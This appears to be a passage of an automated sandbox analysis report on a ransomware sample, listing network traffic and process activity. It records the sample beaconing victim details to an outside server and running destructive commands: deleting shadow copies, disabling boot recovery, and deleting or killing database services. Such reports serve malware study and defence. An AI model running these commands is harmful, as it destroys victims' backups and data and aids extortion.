                        Dec 7, 2024 12:41:44.084850073 CET192.168.2.1192.168.2.48306(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:43:09.089067936 CET192.168.2.1192.168.2.48306(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 7, 2024 12:40:57.978534937 CET192.168.2.41.1.1.10xbb8dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                        Dec 7, 2024 12:40:59.562832117 CET192.168.2.41.1.1.10x7069Standard query (0)whyers.ioA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 7, 2024 12:40:58.115874052 CET1.1.1.1192.168.2.40xbb8dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                        Dec 7, 2024 12:40:58.115874052 CET1.1.1.1192.168.2.40xbb8dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                        Dec 7, 2024 12:40:58.115874052 CET1.1.1.1192.168.2.40xbb8dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                        Dec 7, 2024 12:40:59.700615883 CET1.1.1.1192.168.2.40x7069No error (0)whyers.io13.248.169.48A (IP address)IN (0x0001)false
                        Dec 7, 2024 12:40:59.700615883 CET1.1.1.1192.168.2.40x7069No error (0)whyers.io76.223.54.146A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • whyers.io
                        • api.ipify.org

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449732172.67.74.152806904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        Dec 7, 2024 12:40:58.254108906 CET137OUTGET / HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: api.ipify.org
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Dec 7, 2024 12:40:59.349797964 CET430INHTTP/1.1 200 OK
                        Date: Sat, 07 Dec 2024 11:40:59 GMT
                        Content-Type: text/plain
                        Content-Length: 12
                        Connection: keep-alive
                        Vary: Origin
                        cf-cache-status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 8ee43e75eaa442dc-EWR
                        server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=137&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                        Data Ascii: 8.46.123.228


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973313.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:01 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:01 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:01 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:01 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.44973413.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:03 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:03 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:03 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:03 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.44973813.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:05 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:05 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:05 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:05 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.44973913.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:07 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:07 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:07 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:07 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.44974013.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:12 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:12 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:12 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:12 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.44974213.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:14 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:14 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:14 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:14 GMT
                        Content-Length: 0
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.44974413.248.169.484436904C:\Users\user\Desktop\malware.exe
                        TimestampBytes transferredDirectionData
                        2024-12-07 11:41:16 UTC148OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: whyers.io
                        Content-Length: 163
                        Cache-Control: no-cache
                        2024-12-07 11:41:16 UTC163OUTData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 44 38 36 37 41 41 42 43 42 36 43 46 39 30 45 30 39 37 37 38 36 38 35 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 45 6e 74 65 72 70 72 69 73 65 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 38 2e 34 36 2e 31 32 33 2e 32 32 38 2c 25 32 30 38 31 38 32 32 35 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 31 31 30
                        Data Ascii: user=panda&TargetID=D867AABCB6CF90E097786850&SystemInformation=Windows%2010%20Enterprise%20x64,%20CH,%208.46.123.228,%20818225&max_size_of_file=0.0&size_of_hdd=110
                        2024-12-07 11:41:16 UTC110INHTTP/1.1 405 Method Not Allowed
                        Date: Sat, 07 Dec 2024 11:41:16 GMT
                        Content-Length: 0
                        Connection: close


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:06:40:53
                        Start date:07/12/2024
                        Path:C:\Users\user\Desktop\malware.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\malware.exe"
                        Imagebase:0x780000
                        File size:146'944 bytes
                        MD5 hash:99BFAAACEBF1B34FDEBD4E7CE4070A36
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:1
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:06:40:53
                        Start date:07/12/2024
                        Path:C:\Windows\System32\vssadmin.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
                        Imagebase:0x7ff64f9e0000
                        File size:145'920 bytes
                        MD5 hash:B58073DB8892B67A672906C9358020EC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:3
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:06:40:54
                        Start date:07/12/2024
                        Path:C:\Windows\SysWOW64\sc.exe
                        Wow64 process (32bit):true
                        Commandline:sc delete "MSSQLFDLauncher"
                        Imagebase:0x170000
                        File size:61'440 bytes
                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:17
                        Start time:06:41:33
                        Start date:07/12/2024
                        Path:C:\Windows\System32\notepad.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FILE RECOVERY.txt
                        Imagebase:0x7ff7c9fc0000
                        File size:201'216 bytes
                        MD5 hash:27F71B12CB585541885A31BE22F61C83
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:false

                        Disassembly

                        No disassembly